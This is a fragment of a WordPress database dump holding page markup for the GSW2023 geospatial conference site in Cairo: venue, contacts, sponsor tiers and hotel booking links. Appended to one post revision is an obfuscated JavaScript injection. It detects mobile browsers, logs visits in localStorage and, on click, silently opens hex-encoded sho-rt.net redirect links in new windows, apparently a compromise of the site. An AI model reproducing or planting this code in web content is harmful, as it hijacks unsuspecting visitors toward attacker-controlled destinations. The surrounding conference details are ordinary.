vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-14 10:53:36','2023-06-14 10:53:36','',3066,'https://gsw2023.com/?p=4703',0,'revision','',0),
(4704,1,'2023-06-14 10:54:11','2023-06-14 10:54:11','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]&nbsp;</p>\n<p><a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px 